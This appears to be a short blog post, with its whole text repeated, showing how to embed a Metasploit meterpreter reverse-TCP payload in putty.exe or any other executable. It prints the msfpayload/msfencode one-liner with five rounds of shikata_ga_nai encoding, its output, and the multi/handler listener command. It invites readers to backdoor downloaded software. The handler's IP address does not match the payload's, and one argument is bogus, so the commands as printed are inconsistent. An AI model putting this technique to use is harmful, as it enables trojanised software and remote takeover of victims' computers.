With one of the latest revisions to Metasploit came an added feature that often took a long period of time to do manually as attackers. The ability to embed a Metasploit Payload in any executable that you want to is simply brilliant. When I say any executable, its any executable. You want to backdoor something you download from the internet? How about iexplorer? Or explorer.exe or putty, any of these would work. Best part about it is its extremely simple. Here is a one liner on how to take whatever executable you want and embed whatever payload you want.
relik@fortress:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.1.132 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_backdoored.exe -e x86/shikata_ga_nai -c 5 [*] x86/shikata_ga_nai succeeded with size 927 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 1023 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 1093(iteration=3) [*] x86/shikata_ga_nai succeeded with size 1193 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 1248 (iteration=5)
relik@fortress:/pentest/exploits/framework3# ./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=10.10.1.231 lport=8080 payload=windows/meterpreter/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on port 8080 [*] Starting the payload handler...
Now click on putty.exe and have your listener up and you've now backdoored your first executable and enjoy your meterpreter shell.
With one of the latest revisions to Metasploit came an added feature that often took a long period of time to do manually as attackers. The ability to embed a Metasploit Payload in any executable that you want to is simply brilliant. When I say any executable, its any executable. You want to backdoor something you download from the internet? How about iexplorer? Or explorer.exe or putty, any of these would work. Best part about it is its extremely simple. Here is a one liner on how to take whatever executable you want and embed whatever payload you want.
relik@fortress:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.1.132 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_backdoored.exe -e x86/shikata_ga_nai -c 5 [*] x86/shikata_ga_nai succeeded with size 927 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 1023 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 1093(iteration=3) [*] x86/shikata_ga_nai succeeded with size 1193 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 1248 (iteration=5)
relik@fortress:/pentest/exploits/framework3# ./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=10.10.1.231 lport=8080 payload=windows/meterpreter/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on port 8080 [*] Starting the payload handler...
Now click on putty.exe and have your listener up and you've now backdoored your first executable and enjoy your meterpreter shell.
